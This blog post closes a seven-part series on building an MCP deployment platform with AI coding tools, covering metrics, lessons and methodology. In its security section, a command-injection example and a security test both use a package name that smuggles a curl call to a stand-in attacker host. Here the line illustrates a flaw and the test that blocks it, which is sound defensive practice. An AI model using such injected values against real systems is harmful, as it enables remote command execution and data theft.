PART 7 OF 7

Lessons Learned - The AI Orchestrator's Handbook

December 27, 2025
15 min read

Part 7: Lessons Learned - The AI Orchestrator's Handbook

The Story So Far: In 2 weeks (Dec 11-23, 2025), I built a production MCP deployment platform entirely with AI orchestration. Zero lines manually coded. But what did I actually learn?

This is the handbook I wish I had on Day 1.

The Final Numbers

Before the lessons, let's quantify what AI orchestration achieved:

Quantitative Results

Time Investment: ~60 hours over 13 days

  • AI code generation: ~15 hours (25%)
  • Code review & validation: ~12 hours (20%)
  • Debugging infrastructure: ~18 hours (30%)
  • Testing and quality assurance: ~8 hours (13%)
  • Documentation: ~7 hours (12%)

Code Output:

  • Backend (Python): ~2,100 lines
  • Frontend (TypeScript): ~1,300 lines
  • Infrastructure (Docker, configs): ~200 lines
  • Tests: ~800 lines
  • Total: ~4,400 lines of production code

Documentation:

  • AI_ORCHESTRATION.md: 3,500 words
  • CONTRIBUTING.md: 800 words
  • AUTH_TROUBLESHOOTING.md: 600 words
  • SETUP.md: 600 words
  • DEPLOYMENT.md: 900 words
  • README.md: 1,200 words
  • Context files: ~5,000 words
  • Total: ~13,000 words (roughly three words of documentation per line of code)

Quality Metrics:

  • Test coverage: 87%
  • Type safety: 100% (zero 'any' types in TypeScript)
  • Linter compliance: 100% (passes ruff and eslint with zero warnings)
  • Security review: Passed multi-agent audit (4 AI reviewers)

Production Deployment:

  • Backend: https://catwalk-backend.fly.dev
  • PostgreSQL: Fly.io managed database ✅
  • Frontend: Vercel deployment ✅
  • End-to-end MCP tool calling: Works ✅

Manual Coding: 0 lines

  • Everything generated by AI
  • My role: architect, reviewer, debugger, validator

Estimated Time Savings vs Manual Coding: ~140 hours

  • Traditional estimate for this scope: ~200 hours
  • Actual time spent: ~60 hours
  • Savings: ~140 hours (70% reduction)

Qualitative Results

System Architecture: Comparable to a senior engineer's design

  • 3-layer architecture (Frontend → Backend → MCP Containers)
  • Proper separation of concerns
  • Security-first credential management
  • Production-grade error handling

Code Quality: Production-ready

  • Type-safe throughout
  • Comprehensive error handling
  • Extensive input validation
  • Secret masking and audit logging

Developer Experience: Smooth

  • Clear setup instructions
  • Robust error messages
  • Comprehensive troubleshooting guides
  • Active documentation

Proof of Concept: Validated

Where AI Excelled

1. Boilerplate and Patterns (95%+ AI Success Rate)

What AI nailed:

  • FastAPI endpoint scaffolding
  • SQLAlchemy model relationships
  • Pydantic validation schemas
  • React component structure
  • TypeScript type definitions
  • Alembic database migrations
  • Docker multi-stage builds
  • API client generation

Example: Dynamic form generation component

Prompt:

Create a FormBuilder component that:
- Takes AnalysisResult as input
- Generates form fields from env_vars array
- Uses password inputs for secrets
- Validates required fields
- Type-safe with TypeScript strict mode

AI delivered: ~150 lines of perfect TypeScript in under 5 minutes.

Why this worked: Form generation is a well-documented pattern in React. Massive training data.

2. Testing (90%+ AI Success Rate)

What AI generated perfectly:

  • Unit test structure (pytest, Vitest)
  • Mocking patterns (unittest.mock, vi.mock)
  • Integration test scenarios
  • Edge case coverage
  • Assertion logic

Example: Package validator tests

# Generated by Claude Code
@pytest.mark.asyncio
async def test_validate_package_npm_success():
    """Test successful npm package validation"""
    validator = PackageValidator()

    result = await validator.validate_package("@modelcontextprotocol/server-github")

    assert result["valid"] is True
    assert result["runtime"] == "npm"
    assert result["error"] is None

@pytest.mark.asyncio
async def test_validate_package_invalid():
    """Test invalid package name"""
    validator = PackageValidator()

    result = await validator.validate_package("definitely-not-a-real-package-xyz")

    assert result["valid"] is False
    assert result["runtime"] == "unknown"
    assert "not found" in result["error"]

51 tests generated. 90% worked first try. 10% needed minor mock adjustments.

Why this worked: Testing patterns are formulaic. AI has seen millions of test examples.

3. Documentation Structure (85%+ AI Success Rate)

What AI generated well:

  • README.md templates
  • API documentation (Swagger/OpenAPI)
  • Inline code comments
  • Setup instructions
  • Architecture diagrams (Mermaid markdown)

Example: SETUP.md generated from a simple prompt

Prompt: "Write SETUP.md with local development instructions for both backend and frontend"

AI delivered: Complete setup guide with:

  • Prerequisites
  • Step-by-step installation
  • Environment variable configuration
  • Running tests
  • Troubleshooting common issues

Why this worked: Documentation templates are abundant in open source projects.

4. Refactoring (80%+ AI Success Rate)

What AI did efficiently:

  • Extract functions into modules
  • Rename variables consistently
  • Update imports across files
  • Convert camelCase ↔ snake_case
  • Add type hints to existing code

Example: Extracted Zod schema generation from FormBuilder component

Prompt: "Extract Zod schema generation logic from FormBuilder.tsx into a dedicated utility file"

AI output:

  1. Created lib/generate-zod-schema.ts with extracted logic
  2. Updated FormBuilder.tsx to import the utility
  3. Updated all tests to use new utility
  4. Fixed all import paths

Time: ~2 minutes

Manual estimate: ~20 minutes (find all references, update imports, validate)

Why this worked: Refactoring is pattern matching. AI understands dependency graphs.

Where AI Struggled

1. Infrastructure-Specific Quirks (30% AI Success Rate)

What AI got wrong initially:

  • PostgreSQL driver selection (asyncpg vs psycopg3)
  • Fly.io SSL parameter handling
  • Docker CRLF line ending issues (Windows)
  • Environment variable timing (build vs runtime)
  • Fly.io Postgres cluster recovery

Example: The asyncpg disaster

AI's first suggestion:

# Use asyncpg for PostgreSQL
pip install asyncpg
DATABASE_URL = "postgresql+asyncpg://..."

The reality: asyncpg doesn't support Fly.io's sslmode parameter → crashes

The fix (manual):

# Use psycopg3 instead
pip install psycopg[binary]
DATABASE_URL = "postgresql+psycopg://..."

Why AI struggled: Fly.io-specific quirks aren't in training data. Infrastructure combinations (Fly.io + SQLAlchemy + SSL) are niche.

Lesson: Don't trust AI blindly on infrastructure. Validate in real environments.
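
For completeness, here's roughly what the working setup looks like. This is a minimal sketch, not the project's actual code, and it assumes Fly.io hands the app a DATABASE_URL beginning with postgres://:

# Hypothetical helper: point SQLAlchemy at psycopg3 and keep Fly.io's sslmode intact
from sqlalchemy.ext.asyncio import create_async_engine

def make_engine(raw_url: str):
    # Assumed format: postgres://user:pass@host:5432/db?sslmode=require
    # psycopg3 understands sslmode natively; asyncpg rejects it, which caused the crash above.
    url = raw_url.replace("postgres://", "postgresql+psycopg://", 1)
    return create_async_engine(url, pool_pre_ping=True)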

2. Security Vulnerabilities (20% AI Success Rate)

What AI missed:

  • Command injection in package name handling
  • Credential leaks in API responses
  • Missing input validation
  • Race conditions in concurrent code
  • Lack of audit logging

Example: Command injection vulnerability

AI-generated code:

# VULNERABLE - no validation
package_name = user_input["package"]
env = {"MCP_PACKAGE": package_name}  # Injected into shell

The attack:

package_name = "@evil/pkg; curl http://attacker.com/steal"
# Shell executes: npx -y @evil/pkg; curl http://attacker.com/steal

Why AI missed this: AI generates happy paths. Security requires adversarial thinking.

Solution: Use multi-agent code review (CodeRabbit caught this)
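
The eventual fix validates package names before anything reaches a shell (the real fix also checks the npm and PyPI registries, as described in Step 8 below). A minimal sketch with illustrative regexes:

# Hypothetical validator: reject anything that isn't a plausible npm or PyPI package name
import re

NPM_NAME = re.compile(r"^(@[a-z0-9][\w.-]*/)?[a-z0-9][\w.-]*$")
PYPI_NAME = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9._-]*[A-Za-z0-9])?$")

def is_safe_package_name(name: str) -> bool:
    # Shell metacharacters (;, |, &, $, backticks, spaces) never match these patterns,
    # so "@evil/pkg; curl http://attacker.com/steal" is rejected before any shell sees it.
    return bool(NPM_NAME.match(name) or PYPI_NAME.match(name))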

3. Cross-System Integration (40% AI Success Rate)

What AI failed to connect:

  • NextAuth session → PostgreSQL user sync
  • JWT token creation → backend verification
  • Frontend auth flow → backend dependencies
  • Fly.io machine creation → backend proxying

Example: The user sync gap

AI generated:

  • NextAuth configuration ✅
  • JWT signing logic ✅
  • Backend auth middleware ✅

AI didn't generate:

  • The glue code that syncs users from NextAuth to PostgreSQL

Why this happened: Each piece exists in training data, but the integration between them is project-specific.

Lesson: AI generates components. You architect how they fit together.
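
For context, the missing glue is small: an upsert keyed on the identity inside the verified JWT. A minimal sketch, assuming a verified claims dict and the project's SQLAlchemy User model (names here are illustrative):

# Hypothetical glue: sync the NextAuth identity into PostgreSQL on first authenticated request
from sqlalchemy import select
from sqlalchemy.ext.asyncio import AsyncSession

async def get_or_create_user(session: AsyncSession, claims: dict) -> "User":
    # User is assumed to be the project's SQLAlchemy model with email/name columns
    result = await session.execute(select(User).where(User.email == claims["email"]))
    user = result.scalar_one_or_none()
    if user is None:
        user = User(email=claims["email"], name=claims.get("name", ""))
        session.add(user)
        await session.commit()
        await session.refresh(user)
    return user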

4. Environment Configuration (10% AI Success Rate)

What AI couldn't validate:

  • Whether .env files have required secrets
  • If Fly.io secrets are set correctly
  • Secret value mismatches between environments
  • Timing issues (when env vars are loaded)

Example: AUTH_SECRET mismatch nightmare (Part 5)

AI generated: Code that uses process.env.AUTH_SECRET

AI didn't check:

  • Is this variable defined in .env.local?
  • Does it match the backend secret?
  • Is it set at build time or runtime?

Result: Days of debugging 401 errors

Why AI can't help: Environment state is invisible to AI. It only sees code.

Lesson: Manual environment validation is non-negotiable.
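
The cheapest mitigation I've found is a fail-fast check at process startup, so a missing secret surfaces as one clear error instead of a trail of 401s. A minimal sketch (the variable list is illustrative):

# Hypothetical startup check: crash loudly if required secrets are missing
import os
import sys

REQUIRED_ENV_VARS = ["DATABASE_URL", "AUTH_SECRET", "FLY_API_TOKEN", "ENCRYPTION_KEY"]

def check_environment() -> None:
    missing = [name for name in REQUIRED_ENV_VARS if not os.environ.get(name)]
    if missing:
        sys.exit(f"Missing required environment variables: {', '.join(missing)}")

Note this only catches missing values. It can't tell you that AUTH_SECRET differs between Vercel and Fly.io; that still means checking both dashboards by hand.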

5. Debugging Production Issues (5% AI Success Rate)

What AI couldn't debug:

  • Fly.io Postgres "no active leader found" error
  • SSL certificate issues
  • Network connectivity between machines
  • Log interpretation

Example: PostgreSQL cluster failure

The error: no active leader found

AI's suggestion: "Try restarting the database"

The reality: Single-node cluster in unrecoverable state. Must destroy and recreate.

Why AI failed: Requires infrastructure knowledge (Fly.io Postgres architecture) + log interpretation + operational experience.

Lesson: Infrastructure debugging is still human work.

The Reproducible Methodology

Based on this journey, here's the step-by-step framework for AI-orchestrated development:

Phase 1: Foundation (Before Writing Code)

Step 1: Create Context Structure

Before a single line of code:

project/
├── AGENTS.md              # AI system prompt
├── context/
│   ├── ARCHITECTURE.md    # System design
│   ├── CURRENT_STATUS.md  # Living status doc
│   ├── TECH_STACK.md      # Every dependency + why
│   └── Project_Overview.md # Problem + solution

Step 2: Write Structured Prompts

Bad prompt: "Build an MCP deployment platform"

Good prompt:

Build a platform for deploying MCP servers to Fly.io.

REQUIREMENTS:
- GitHub repo analysis with Claude API
- Credential encryption (Fernet)
- Fly.io machine deployment
- MCP Streamable HTTP (2025-06-18 spec)

TECH STACK:
- Frontend: Next.js 15, React 19, TypeScript 5+ (strict mode)
- Backend: FastAPI, PostgreSQL + psycopg3, SQLAlchemy async
- Infrastructure: Fly.io Machines API, Docker

QUALITY:
- Zero TypeScript 'any' types
- Passes ruff (Python) / eslint (TypeScript) with zero warnings
- Comprehensive error handling
- Input validation with Pydantic

SECURITY:
- Validate all user input
- Mask secrets in API responses
- No shell injection risks
- Audit logging for sensitive actions

SUCCESS CRITERIA:
- End-to-end MCP tool calling works
- Production deployed on Fly.io
- 85%+ test coverage

Step 3: Multi-AI Cross-Validation

Feed the same prompt to:

  1. Claude Code
  2. ChatGPT-4
  3. Google Gemini

Compare architectures. Where they agree = good design. Where they disagree = complexity indicator.

Phase 2: Implementation (Code Generation)

Step 4: Phase-Based Development

Break project into explicit phases:

  • Phase 1: Database models + encryption
  • Phase 2: Analysis service
  • Phase 3: Deployment orchestration
  • Phase 4: Frontend UI
  • Phase 5: Production deployment

One phase per session. Don't let AI scope-creep.

Step 5: Generate Code with Constraints

Always include:

CONSTRAINTS:
- Type-safe (no 'any' in TypeScript, full hints in Python)
- Linter-compliant (must pass ruff/eslint)
- Error handling for all failure modes
- Tests for critical paths

Update CURRENT_STATUS.md when done.

Step 6: Immediate Validation

After each code generation:

# Backend
ruff check .
ruff format .
pytest

# Frontend
bun run typecheck
bun run lint
bun run test

Don't proceed until all checks pass.

Phase 3: Quality Control (Validation)

Step 7: Multi-Agent Code Review

Set up on GitHub (free for open source):

  • CodeRabbit (security)
  • Qodo (edge cases)
  • Gemini Code Assist (quality)
  • Greptile (integration)

Create PR for each phase. Let agents review.

Step 8: Fix Review Feedback

Feed agent comments back to AI:

CodeRabbit flagged command injection in deployment service.
Add package validation against npm/PyPI registries before deploying.

AI generates fixes. You validate.

Step 9: Test in Real Environments

Don't trust local development.

Deploy to staging (or production if you're brave):

  • Real database (not SQLite)
  • Real secrets management
  • Real network conditions
  • Real SSL/TLS

Catch environment issues early.

Phase 4: Documentation (Knowledge Capture)

Step 10: Document As You Go

After each debugging session:

  • Update CURRENT_STATUS.md (what works, what doesn't)
  • Update AGENTS.md if you learned new AI interaction patterns
  • Create troubleshooting docs for nasty bugs (like AUTH_TROUBLESHOOTING.md)

Step 11: Write for Future You

Assume you'll forget everything in 1 week.

Document:

  • Why you chose psycopg3 over asyncpg
  • How to recover from Fly.io Postgres failures
  • Which secrets must match across environments

Future you will thank past you.

Phase 5: Security Audit (Adversarial Review)

Step 12: Think Like an Attacker

AI generates happy paths. You must find malicious paths.

Ask:

  • What if user input contains shell metacharacters?
  • What if API key is compromised?
  • What if user submits 10,000 requests/second?
  • What if database connection fails mid-transaction?

Prompt AI for fixes:

Add input validation that rejects shell metacharacters.
Add rate limiting (100 req/min per IP).
Add transaction rollback on errors.
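
The rollback piece of that prompt, for instance, is mostly a matter of letting SQLAlchemy's session transaction do its job. A minimal sketch (assuming an async session per request):

# Hypothetical pattern: session.begin() commits on success and rolls back on any exception
from sqlalchemy.ext.asyncio import AsyncSession

async def save_record(session: AsyncSession, record) -> None:
    async with session.begin():
        session.add(record)
        # anything that raises inside this block rolls the whole transaction back,
        # so a failed deployment never leaves a half-written row behind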

Step 13: Security Testing

Generate attack scenarios:

# Test command injection
malicious_package = "@evil/pkg; curl http://attacker.com"
response = await create_deployment({"package": malicious_package})
assert response.status_code == 400  # Must reject

If tests pass = exploit blocked. If tests fail = vulnerability found.

Phase 6: Production Hardening (Polish)

Step 14: Error Message Quality

Bad (AI default):

{"error": "Failed to create deployment"}

Good (prompt for better UX):

{
  "error": "invalid_package",
  "message": "Package '@evil/pkg; curl' not found in npm or PyPI",
  "help": "Verify the package name at https://npmjs.com",
  "docs": "https://docs.catwalk.live/troubleshooting#invalid-package"
}
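
In FastAPI, that richer response is just a structured detail payload. A minimal sketch mirroring the fields above (the helper name is illustrative):

# Hypothetical helper: raise a structured error instead of a bare string
from fastapi import HTTPException

def invalid_package_error(package_name: str) -> HTTPException:
    return HTTPException(
        status_code=400,
        detail={
            "error": "invalid_package",
            "message": f"Package '{package_name}' not found in npm or PyPI",
            "help": "Verify the package name at https://npmjs.com",
            "docs": "https://docs.catwalk.live/troubleshooting#invalid-package",
        },
    )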

Step 15: Observability

Add logging, metrics, and monitoring:

logger.info(f"Deployment {id} created by user {user.email}")
logger.warning(f"Package validation failed: {package_name}")
logger.error(f"Fly.io API error: {error}", extra={"deployment_id": id})

Production debugging without logs is impossible.

The Skill Shift

Old Role: Developer (Code Writer)

Primary skill: Writing syntactically correct code

Daily work:

  • Implementing functions line-by-line
  • Debugging syntax errors
  • Googling "how to X in language Y"
  • Stack Overflow for common patterns

Value: Lines of code produced

New Role: AI Orchestrator (System Architect)

Primary skill: Architecting systems and validating AI outputs

Daily work:

  • Designing system architecture
  • Writing structured prompts with constraints
  • Reviewing AI-generated code for logic errors
  • Debugging infrastructure and integration issues
  • Thinking adversarially about security
  • Documenting decisions and debugging paths

Value: System quality and velocity

What This Means for Your Career

Skills that INCREASE in value:

  1. System design - AI needs architectural direction
  2. Prompt engineering - Specificity = quality
  3. Code review - Validating AI outputs critically
  4. Debugging - Infrastructure, integration, environment
  5. Security thinking - Adversarial mindset
  6. Documentation - Making implicit knowledge explicit

Skills that DECREASE in value:

  1. Syntax memorization - AI knows every API
  2. Boilerplate writing - AI generates it instantly
  3. Pattern copying - AI has seen all patterns
  4. Manual refactoring - AI does it faster

The transition: From writing code → validating systems

Analogy: Before trucks, moving rocks required strong backs. After trucks, it required knowing how to drive and where to deliver.

Common Pitfalls and How to Avoid Them

Pitfall 1: Blindly Trusting AI

Symptom: Merging AI-generated code without review

Risk: Security vulnerabilities, logic errors, integration failures

Solution:

  • Always run linters and tests
  • Review diffs manually
  • Think: "What could go wrong?"
  • Use multi-agent code review

Pitfall 2: Vague Prompts

Symptom: AI generates code that "kind of works" but has issues

Risk: Wasted time iterating, poor code quality

Solution:

  • Specific tech stack (Next.js 15, not just "React")
  • Explicit constraints (no 'any' types, must pass linter)
  • Success criteria (what does "done" look like?)

Pitfall 3: No External Memory

Symptom: AI "forgets" decisions across sessions, regenerates code you already rejected

Risk: Inconsistent architecture, wasted effort

Solution:

  • Create AGENTS.md and context/ structure
  • Update after each session
  • Start new sessions by loading context

Pitfall 4: Skipping Environment Validation

Symptom: Code works locally but fails in production

Risk: Deployment disasters, late-night debugging

Solution:

  • Test in production-like environments early
  • Validate secrets are set before deploying
  • Document environment setup explicitly

Pitfall 5: Ignoring Review Agents

Symptom: Security issues and quality problems slip through

Risk: Vulnerabilities in production, maintainability issues

Solution:

  • Set up CodeRabbit, Qodo, Gemini Code Assist, Greptile
  • Review all their comments
  • Feed feedback back to AI for fixes

The Economics of AI Orchestration

Costs

AI Services (my actual usage):

  • Claude Code (Anthropic CLI): $0 (included in Claude Pro subscription)
  • OpenRouter (analysis service): ~$2 (used Claude Haiku 4.5)
  • GitHub Copilot: Not used
  • ChatGPT Plus: $20/month (used for cross-validation)

Total AI costs: ~$22 for the project

Infrastructure:

  • Fly.io backend: ~$2/month (always-on shared-cpu)
  • PostgreSQL: $0 (free tier)
  • Vercel frontend: $0 (free tier)

Total infrastructure: ~$2/month

Time Investment: ~60 hours @ $100/hour freelance rate = $6,000 opportunity cost

Value Created

Code produced: ~4,400 lines production-ready

  • Traditional estimate: ~200 hours @ $100/hour = $20,000
  • AI-assisted actual: ~60 hours @ $100/hour = $6,000
  • Savings: $14,000 (70% time reduction)

Alternatives considered:

  • Hire developers: $10,000+ for this scope
  • Learn to code manually: 6+ months to reach this proficiency
  • Use no-code tools: Nothing exists for this use case (MCP deployment)

ROI: ~636x return on AI costs ($14,000 saved / $22 in AI costs)

Intangible value:

  • Learned AI orchestration methodology (transferable skill)
  • Portfolio piece (open source project)
  • Documentation case study (blog series)
  • Validated production deployment (proof of concept)

The Future (My Predictions)

1-2 Years: AI Orchestration Becomes Standard

What changes:

  • "Junior developer" means "good at prompting AI"
  • Code review becomes "AI output review"
  • 10x productivity gains become normal
  • Solo founders ship enterprise-scale products

What doesn't change:

  • System architecture still requires humans
  • Security thinking still requires humans
  • Product decisions still require humans
  • Debugging infrastructure still requires humans

3-5 Years: AI Handles More of the Stack

Speculation:

  • AI debugs infrastructure (interprets logs, fixes config)
  • AI performs security audits automatically
  • AI handles deployment and rollbacks
  • AI writes documentation from code changes

What humans do:

  • Define product vision
  • Make trade-off decisions
  • Validate system behavior
  • Handle novel problems (edge cases AI hasn't seen)

10+ Years: Unknown

Possibilities:

  • AI handles full system design
  • Human role becomes "product vision" only
  • Or: We discover new bottlenecks AI can't solve
  • Or: Human oversight remains critical for safety

What I believe: The orchestration skill (getting AI to build what you envision) will remain valuable indefinitely.

Your Action Plan

Want to replicate this methodology? Here's your Week 1:

Day 1: Setup

  • Sign up for Claude Code (or Cursor, or Copilot)
  • Create a project with AGENTS.md and context/ structure
  • Install linters (ruff for Python, eslint for TypeScript)

Day 2: Practice Prompting

  • Choose a simple project (e.g., "Build a todo API")
  • Write a structured prompt with constraints
  • Generate code, run linters, iterate

Day 3: Review and Validate

  • Set up CodeRabbit on GitHub (free for open source)
  • Create PR with AI-generated code
  • Review agent feedback, feed back to AI

Day 4: Infrastructure Deploy

  • Deploy to real environment (Fly.io, Vercel, Railway)
  • Encounter environment issues
  • Document solutions

Day 5: Security Thinking

  • Try to break your own system
  • Generate attack scenarios as tests
  • Prompt AI to fix vulnerabilities

Day 6: Documentation

  • Write troubleshooting guide
  • Update AGENTS.md with learnings
  • Create README for future you

Day 7: Reflect

  • What did AI do well?
  • What required manual intervention?
  • How would you do it differently next time?

Repeat this cycle. Each iteration, you'll get faster and more effective.

Final Thoughts

Can AI build production systems?

Yes - with heavy human orchestration.

AI is not a replacement for developers. It's a power tool that amplifies human architects.

The skill isn't coding anymore. It's:

  • Architecting systems worth building
  • Prompting AI with precision
  • Validating outputs critically
  • Debugging the real world
  • Making trade-offs under uncertainty

This is the new craft.

And honestly? I love it.

I get to focus on problems I care about (MCP deployment UX, credential security, system architecture) instead of fighting syntax errors and writing boilerplate.

AI handles the tedious. I handle the interesting.

That's the future I want to build in.


Acknowledgments

Built with:

  • Claude Code (Anthropic) - Primary implementation
  • Cursor - Refactoring and iteration (mentioned in docs)
  • Google Gemini - Planning and cross-validation
  • ChatGPT-4 - Architecture validation

Reviewed by:

  • CodeRabbit - Security analysis
  • Qodo - Edge case detection
  • Gemini Code Assist - Code quality
  • Greptile - Integration checks

Inspired by:

  • Vercel's developer experience
  • The MCP ecosystem
  • The AI orchestration community
  • Every developer frustrated with infrastructure complexity

Special thanks to you, the reader, for making it through all 7 parts. If this series helped you, pay it forward - share the methodology.


Where to Go From Here

Explore the codebase:

  • https://github.com/zenchantlive/catwalk

Try it yourself:

  • Fork the repo
  • Deploy to Fly.io
  • Contribute improvements
  • Document your own AI orchestration journey

Connect:

  • Questions? Open a GitHub issue
  • Built something similar? Share in discussions
  • Want to hire an AI orchestrator? Email: jordanlive121@gmail.com

Read the other parts:


This is the end of the series. But it's just the beginning of AI-orchestrated development.

Your turn. Build something.


Series: Building Catwalk Live with AI Orchestration (Complete)
Author: Jordan Hindo (AI Orchestrator, Technical Product Builder)
Project: https://github.com/zenchantlive/catwalk
License: MIT
Published: December 2025

All 7 parts written, researched, and structured - documenting a real journey from initial commit to production deployment, entirely through AI orchestration.


Jordan Hindo

Full-stack Developer & AI Engineer building in public. Exploring the future of agentic coding and AI-generated assets.
